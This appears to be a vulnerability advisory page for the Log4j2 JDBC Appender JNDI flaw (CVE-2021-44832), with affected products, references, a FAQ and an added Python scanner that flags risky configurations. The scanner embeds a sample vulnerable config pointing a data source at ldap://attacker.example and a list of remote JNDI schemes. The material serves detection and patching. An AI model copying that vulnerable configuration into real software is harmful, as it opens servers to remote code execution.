Vulnerability Description
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to remote code execution (RCE) when the logging configuration uses a JDBC Appender whose DataSource is resolved through a JNDI LDAP URI and an attacker controls the LDAP server that URI points to. Unlike CVE-2021-44228, this requires the attacker to be able to modify the Log4j configuration rather than merely get a string logged, which is why the severity is MEDIUM. The issue is fixed in Log4j2 2.17.1, 2.12.4 and 2.3.2 by restricting JNDI data source names to the java protocol.
CVSS Score
6.6 (MEDIUM)
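As an added example (not code from the Log4j project or from any of the advisories referenced below), here is a check a practitioner can run over Log4j2 XML configurations to find the pattern the description refers to: a JDBC Appender whose DataSource is located through a JNDI name with a remote scheme such as ldap:, next to the hardened form that uses a java: name. The two configurations are constructed samples embedded in the script; the appender name, hostname, table name and the log4j2.xml layout are illustrative assumptions.

```python
"""Scan Log4j2 XML configurations for JDBC appenders whose data source is
resolved through JNDI with a non-java: scheme (the CVE-2021-44832 pattern).

Added example, not Log4j code. The sample configurations are constructed."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# JNDI schemes that contact a naming service over the network. If an attacker
# controls that service, the lookup can hand back a reference the JVM turns
# into code execution, which is the RCE path in the description above.
REMOTE_SCHEMES = {"ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns", "nis"}


def jndi_scheme(name):
    """Return the lower-cased URI scheme of a JNDI name, or None if it has none.

    'java:comp/env/jdbc/X' -> 'java'; 'ldap://host/x' -> 'ldap'; 'jdbc/X' -> None.
    """
    return urlsplit(name).scheme.lower() or None


def is_jdbc_appender(elem):
    """True for <JDBC ...> or the strict-syntax <Appender type="JDBC" ...>.
    Log4j2 matches element names case-insensitively, so compare lower-cased."""
    tag = elem.tag.lower()
    return tag == "jdbc" or (tag == "appender" and elem.get("type", "").lower() == "jdbc")


def classify(name):
    """Map a jndiName to (scheme, verdict)."""
    scheme = jndi_scheme(name)
    if scheme == "java":
        return scheme, "ok"        # the only protocol the fixed releases permit
    if scheme in REMOTE_SCHEMES:
        return scheme, "remote"    # exploitable if the server is attacker-controlled
    return scheme, "review"        # other scheme, or a bare name resolved in the initial context


def find_jdbc_jndi(config_xml):
    """Return one finding per jndiName found under a JDBC appender.

    Each finding is {"appender", "jndiName", "scheme", "verdict"} with verdict
    'ok', 'remote' or 'review' as defined in classify().
    """
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():
        if not is_jdbc_appender(appender):
            continue
        # Any element below the appender carrying jndiName: <DataSource> in the
        # usual syntax, <ConnectionSource type="DataSource"> in strict syntax.
        for elem in appender.iter():
            name = elem.get("jndiName")
            if name is None:
                continue
            scheme, verdict = classify(name)
            findings.append({"appender": appender.get("name", "?"),
                             "jndiName": name, "scheme": scheme, "verdict": verdict})
    return findings


# Constructed sample: the vulnerable shape. On 2.0-beta7..2.17.0 (other than
# 2.3.2 / 2.12.4) Log4j hands this LDAP URI straight to JNDI when the appender
# starts, so whoever runs attacker.example decides what object comes back.
VULNERABLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="dbAppender" tableName="APPLICATION_LOG">
      <DataSource jndiName="ldap://attacker.example:1389/o=datasource"/>
      <Column name="EVENT_DATE" isEventTimestamp="true"/>
      <Column name="LEVEL" pattern="%level"/>
      <Column name="MESSAGE" pattern="%message"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: the same appender bound to a container-local java: name.
HARDENED_CONFIG = VULNERABLE_CONFIG.replace(
    "ldap://attacker.example:1389/o=datasource", "java:comp/env/jdbc/LoggingDataSource")


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        for f in find_jdbc_jndi(cfg):
            print(f"{label}: appender={f['appender']} jndiName={f['jndiName']} verdict={f['verdict']}")
```

A 'remote' finding on an unpatched release is an exploitable configuration and should be treated as such until the appender is rebound to a java: name or the release is upgraded. Note that from 2.17.1 onward the JDBC Appender refuses JNDI lookups altogether unless the log4j2.enableJndiJdbc system property is set to true, so even a java: name needs that opt-in on patched versions.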
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Apache | Log4J | >= 2.0-beta7, <= 2.17.0 (excluding 2.3.2 and 2.12.4) |
| Oracle | Communications Diameter Signaling Router | >= 8.0.0.0, <= 8.5.1.0 |
| Oracle | Communications Interactive Session Recorder | 6.3 |
| Oracle | Primavera Gateway | >= 17.12.0, <= 17.12.11 |
| Oracle | Primavera P6 Enterprise Project Portfolio Management | >= 19.12.0, <= 19.12.18.0 |
| Oracle | Primavera Unifier | 18.8 |
| Oracle | Retail Assortment Planning | 16.0.3 |
| Oracle | Retail Fiscal Management | 14.2 |
| Oracle | Siebel Ui Framework | 21.12 |
| Oracle | Weblogic Server | 12.2.1.3.0 |
| Cisco | Cloudcenter | 4.10.0.16 |
| Fedoraproject | Fedora | 34 |
| Debian | Debian Linux | 9.0 |
| Oracle | Communications Brm - Elastic Charging Engine | < 12.0.0.4.6 |
| Oracle | Communications Offline Mediation Controller | < 12.0.0.4.4 |
| Oracle | Flexcube Private Banking | 12.1.0 |
| Oracle | Health Sciences Data Management Workbench | 2.5.2.1 |
| Oracle | Policy Automation | >= 12.2.0, <= 12.2.24 |
| Oracle | Policy Automation For Mobile Devices | >= 12.2.0, <= 12.2.24 |
| Oracle | Product Lifecycle Analytics | 3.6.1 |
Related Weaknesses (CWE)
References
- http://www.openwall.com/lists/oss-security/2021/12/28/1 (Mailing List, Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf (Third Party Advisory)
- https://issues.apache.org/jira/browse/LOG4J2-3293 (Issue Tracking, Patch, Vendor Advisory)
- https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143 (Mailing List, Vendor Advisory)
- https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html (Mailing List, Third Party Advisory)
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedorapro
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedorapro
- https://security.netapp.com/advisory/ntap-20220104-0001/ (Third Party Advisory)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-a (Third Party Advisory)
- https://www.oracle.com/security-alerts/cpuapr2022.html (Patch, Third Party Advisory)
- https://www.oracle.com/security-alerts/cpujan2022.html (Patch, Third Party Advisory)
- https://www.oracle.com/security-alerts/cpujul2022.html (Patch, Third Party Advisory)
FAQ
What is CVE-2021-44832?
CVE-2021-44832 is a vulnerability with a CVSS score of 6.6 (MEDIUM). Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to remote code execution (RCE) when the configuration uses a JDBC Appender with a JNDI LDAP data source URI and an attacker controls the target LDAP server.
How severe is CVE-2021-44832?
CVE-2021-44832 has been rated MEDIUM with a CVSS base score of 6.6/10. The score is lower than that of the earlier Log4j JNDI issues because exploitation requires the ability to modify the logging configuration, not just to get attacker-controlled text logged.
Is there a patch for CVE-2021-44832?
Yes. Apache fixed the issue in Log4j2 2.17.1, 2.12.4 and 2.3.2; see the Apache advisory and the Oracle, Cisco, Debian, Fedora, NetApp and Siemens advisories in the references section above for downstream patch information. Affected products include: Apache Log4J, Oracle Communications Diameter Signaling Router, Oracle Communications Interactive Session Recorder, Oracle Primavera Gateway, Oracle Primavera P6 Enterprise Project Portfolio Management.